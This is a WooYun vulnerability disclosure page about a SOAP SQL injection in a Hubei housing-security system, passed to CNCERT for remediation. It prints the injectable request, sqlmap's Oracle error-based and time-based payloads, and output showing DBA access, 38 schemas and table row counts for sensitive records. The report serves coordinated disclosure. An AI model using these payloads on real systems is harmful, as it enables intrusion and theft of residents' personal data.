当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192182

漏洞标题:某省住房保障局某系统存在SOAP注入漏洞(DBA权限/涉及38个数据库/可泄露几百万的敏感信息)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-04-04 13:40

修复时间:2016-05-21 14:20

公开时间:2016-05-21 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-04: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

38个库,都是几十万的数据,合起来都有好几百几千万的数据量!~~~

详细说明:

湖北省住房保障管理信息系统
注入点:

**.**.**.**:6080/GISServices/GisServices.asmx (POST)
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" 
xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
      <tns:areaName>湖北*</tns:areaName>
      <tns:xmlbName></tns:xmlbName>
      <tns:jsjdName>项目</tns:jsjdName>
      <tns:year></tns:year>
    </tns:GetAreaXMStats>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


tns:areaName处存在注入

sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/
envelope/" xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://www.w3.o
rg/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
      <tns:areaName>????%' AND 3310=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(100)||CHR(107)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (3310=3310) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(101)||CHR(122)||CHR(113)||CH
R(62))) FROM DUAL) AND '%'='</tns:areaName>
      <tns:xmlbName></tns:xmlbName>
      <tns:jsjdName>???</tns:jsjdName>
      <tns:year></tns:year>
    </tns:GetAreaXMStats>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/
envelope/" xmlns:s="http://**.**.**.**/2001/XMLSchema" xmlns:xsi="http://www.w3.o
rg/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <tns:GetAreaXMStats xmlns:tns="http://**.**.**.**/">
      <tns:areaName>????%' AND 3082=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(113)|
|CHR(86)||CHR(112),5) AND '%'='</tns:areaName>
      <tns:xmlbName></tns:xmlbName>
      <tns:jsjdName>???</tns:jsjdName>
      <tns:year></tns:year>
    </tns:GetAreaXMStats>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---
[18:29:26] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[18:29:26] [INFO] fetching current user
[18:29:26] [INFO] retrieved: HBZFBZTEST
current user:    'HBZFBZTEST'
[18:29:26] [INFO] fetching current database
[18:29:26] [INFO] resumed: HBZFBZTEST
[18:29:26] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'HBZFBZTEST'
[18:29:26] [INFO] testing if current user is DBA
current user is DBA:    True
available databases [38]:
[*] CLGL
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HBBZF
[*] HBJZGCGLJ
[*] HBJZGCGLJWF
[*] HBKSPJ
[*] HBSBDYKS
[*] HBZFBZ
[*] HBZFBZNEW
[*] HBZFBZTEMP
[*] HBZFBZTEST
[*] HBZFBZTEST1
[*] HBZFBZWEB
[*] HQZXTEST
[*] HYHOUSE
[*] HYHOUSE1
[*] HYHOUSETEST
[*] LJCLC
[*] LJCLCTEST
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SDE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TESTF
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
Database: HBZFBZTEST
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| BTSF                   | 907119  |		补贴首付
| DXDCCYXX               | 713395  |	底薪调查常用信息
| DXDCJBXX               | 603055  |	底薪调查基本信息
| JTCYQKB                | 550277  |		具体从业情况表
| SQJTCYXX               | 530856  |		税前津贴常用信息	
| ZFXX                   | 520950  |		住房信息
| DXDCZFXX               | 470300  |	底薪调查住房信息
| JTJBQKB                | 457022  |
| SQJTJBXX               | 367516  |
| JTDAB                  | 363887  |		津贴档案簿
| LHJFB                  | 295583  |
| SQJTZFXX               | 292178  |
| BZDXHTQY               | 199284  |
| SQRFWGXB               | 137414  |
| SHXX                   | 116147  |
| MATERIAL_DIR_TABLE     | 113781  |
| JTCYXXBF               | 102470  |
| NSSHXX                 | 93787   |
| MATERIAL_DIR_MXB_TABLE | 84565   |
| JTJBXXBF               | 67809   |
| YHKZHGL                | 59506   |
| JTZFXXBF               | 58759   |
| WYFSJGL                | 40107   |
| BTYF                   | 37604   |
| ZFBZDMB                | 33676   |
| ZRDJSHAJB              | 33375   |
| BTJLB                  | 28038   |
| NSSHAJB                | 25649   |
| DFPSQRGXB              | 23948   |
| FWZJSJ                 | 22329   |
| HTHISTORY              | 20446   |
| HBAZXX                 | 19805   |
| ZLBTTCJL               | 16045   |
| FZZJ                   | 14417   |
| GSXX                   | 14207   |
| SQRBTJE                | 9138    |
| DTGCXX                 | 8811    |
| WYFSD                  | 8238    |
| NSGSXX                 | 7546    |
| BZDXTJYB               | 6734    |
| BTSFJL                 | 6515    |
| XMXX                   | 4650    |
| YPZFYTTGL              | 4466    |
| XMGHXX                 | 3888    |
| IMGTAB                 | 3568    |
| TESTJR                 | 3104    |
| SYS_USER               | 3091    |
| HD                     | 2977    |
| SYS_ROLE_USER          | 2643    |
| BZDXXYGL               | 2636    |
| HZB                    | 2509    |
| SYS_ROLE_MENU          | 2171    |
| XMJDRZXX               | 1915    |
| LHZBXZ                 | 1776    |
| FILEDB                 | 1004    |
| LJCLC                  | 993     |
| XMDETAIL               | 987     |
| LJCLCBF                | 867     |
| XMXXHISTORY            | 733     |
| LZFZLBTBZXZ            | 725     |
| ZRDJGZXZ               | 647     |
| DXDCZCXX               | 618     |
| SQJTZCXX               | 580     |
| SYS_MENU_CONTROL       | 491     |
| SYS_RESOURCE           | 462     |
| TB_SYS_CITY            | 384     |
| ZRDJGZZB               | 260     |
| XMSTATS                | 187     |
| AJGCNDJSJH             | 162     |
| SYS_FOLDER             | 161     |
| LZFZLBTBZ              | 151     |
| LHZBLB                 | 147     |
| SYS_MENU               | 135     |
| XMGHCQAZXX             | 127     |
| LZFBTGS                | 103     |
| SYS_ROLE_CONTROL       | 91      |
| SYS_ROLE               | 66      |
| XMNDJHXX               | 52      |
| YPSFYTH                | 41      |
| BZZJZCYSXX             | 40      |
| BZZJZCXX               | 34      |
| TB_SYS_CAPITAL         | 34      |
| KGJGSTATS              | 33      |
| JTZCXXBF               | 31      |
| TSCL                   | 26      |
| TB_SYS_SYSFILES        | 23      |
| WYGSXX                 | 20      |
| AJGCCITY               | 17      |
| DSZPOINT               | 17      |
| SJTJ                   | 17      |
| XMJSSPDZDA             | 16      |
| BZZJJSXX               | 12      |
| BZHSGHZB               | 8       |
| NDJHJSXMCB             | 8       |
| MATERIAL_MUST_TABLE    | 7       |
| TB_SYS_PARAMCENTER     | 7       |
| BSCYJB                 | 6       |
| TB_SYS_SYSMENU         | 6       |
| XMCQAZHTBA             | 6       |
| ZFBZGHHGZB             | 6       |
| ZFJSGH                 | 6       |
| FZBZ                   | 5       |
| XMJSSPZYZJXX           | 5       |
| TB_SYS_ROLE            | 4       |
| ZRDJGZ                 | 4       |
| BZZJBF                 | 3       |
| DWSJFXX                | 3       |
| TB_SYS_ADMIN           | 3       |
| TB_SYS_DISTRIBUTION    | 3       |
| XMNDJHCQAZXX           | 3       |
| XMXX_PHQCQ             | 3       |
| ZFBZNDJHZB             | 3       |
| DCZBK                  | 2       |
| JSXMAJXXB              | 2       |
| KHPJFAB                | 2       |
| SCYJB                  | 2       |
| SXX                    | 2       |
| WWSBXXB                | 2       |
| XMCYRYXX               | 2       |
| ZFNDJSJH               | 2       |
| ZXJC                   | 2       |
| ZYSJBZZJFPXX           | 2       |
| BBDY                   | 1       |
| BZBZ                   | 1       |
| BZHTMB                 | 1       |
| GIS_MUTUALSTATE        | 1       |
| KHPJZBB                | 1       |
| TB_SYS_USERINFO        | 1       |
| XMJSGCSGHTBAXX         | 1       |
+------------------------+---------+


几百万的信息,就不继续跟进这些敏感信息了!~~~

201.jpg


202.jpg

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-06 14:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.

最新状态:

暂无